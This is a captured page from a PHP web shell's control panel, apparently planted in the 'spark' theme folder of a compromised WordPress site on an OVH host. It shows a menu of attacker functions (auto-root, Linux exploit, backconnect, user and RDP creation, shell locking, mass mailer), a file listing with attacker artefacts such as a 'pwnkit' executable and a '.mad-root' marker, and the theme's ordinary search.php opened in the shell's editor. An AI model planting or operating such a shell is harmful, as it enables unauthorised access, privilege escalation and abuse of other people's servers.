Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
spark /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
866
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
4.33
KB
-rw-r--r--
comments.php
1.04
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
fcontent.php
1.67
KB
-rw-r--r--
featured-box.php
2.47
KB
-rw-r--r--
footer.php
1.12
KB
-rw-r--r--
front-page.php
2.98
KB
-rw-r--r--
fullwidth.php
834
B
-rw-r--r--
functions.php
7.71
KB
-rw-r--r--
functionsbak.php
7.22
KB
-rw-r--r--
header.php
1.33
KB
-rw-r--r--
index.php
2.14
KB
-rw-r--r--
license.txt
14.77
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.06
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
2.1
KB
-rw-r--r--
rtl.css
4.45
KB
-rw-r--r--
screenshot.png
353.43
KB
-rw-r--r--
search.php
2.44
KB
-rw-r--r--
searchform.php
547
B
-rw-r--r--
sidebar-footer.php
1.26
KB
-rw-r--r--
sidebar.php
811
B
-rw-r--r--
single.php
2.15
KB
-rw-r--r--
style-responsive.css
2.05
KB
-rw-r--r--
style.css
19.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php /* SPARK Theme's Search Page Copyright: 2012-2016, D5 Creation, www.d5creation.com Based on the Simplest D5 Framework for WordPress Since SPARK 1.0 */ get_header(); ?> <div id="container"> <?php if (have_posts()) : ?> <div id="content"> <h1 class="page-title fa-search-plus"><?php echo __('Search Results', 'spark'); ?></h1> <?php $counter = 0; ?> <?php query_posts($query_string . "&posts_per_page=20"); ?> <?php while (have_posts()) : the_post(); if($counter == 0) { $numposts = $wp_query->found_posts; // count # of search results ?> <h3 class="arc-src"><span><?php echo __('Search Term:', 'spark');?> </span><?php the_search_query(); ?></h3> <h3 class="arc-src"><span><?php echo __('Number of Results:', 'spark');?> </span><?php echo $numposts; ?></h3><br /> <?php } //endif ?> <div <?php post_class(); ?> id="post-<?php the_ID(); ?>"> <p class="postmetadataw">Entry Date: <?php the_time('F j, Y'); ?></p> <h2 class="post-title"><a href="<?php the_permalink(); ?>"><?php the_title();?></a></h2> <div class="content-ver-sep"></div> <div class="entrytext"> <?php the_post_thumbnail('thumbnail'); ?> <?php spark_content(); ?> <div class="clear"> </div> <div class="up-bottom-border"> <p class="postmetadata"><?php echo __('Posted in', 'spark'); ?> <?php the_category(', ') ?> | <?php edit_post_link( __('Edit', 'spark'), '', ' | '); ?> <?php comments_popup_link(__('No Comments »', 'spark'), __('1 Comment »', 'spark'), __('% Comments »', 'spark')); ?> <?php the_tags('<br />'. __('Tags: ', 'spark'), ', ', '<br />'); ?></p> </div></div></div> <?php $counter++; ?> <?php endwhile; ?> </div> <?php get_sidebar(); ?> <?php else: ?> <br /><br /><h1 class="page-title"><?php echo __('Not Found', 'spark') ?></h1> <h3 class="arc-src"><span><?php echo __('Apologies, but the page you requested could not be found. Perhaps searching will help.', 'spark') ?></span></h3> <?php get_search_form(); ?> <p><a href="<?php echo home_url(); ?>" title="Browse the Home Page">« <?php echo __('Or Return to the Home Page', 'spark') ?></a></p><br /><br /> <h2 class="post-title-color"><?php echo __('You can also Visit the Following. These are the Featured Contents', 'spark') ?></h2> <div class="content-ver-sep"></div><br /> <?php get_template_part( 'featured-box' ); ?> <?php endif; ?> <?php get_footer(); ?>
Close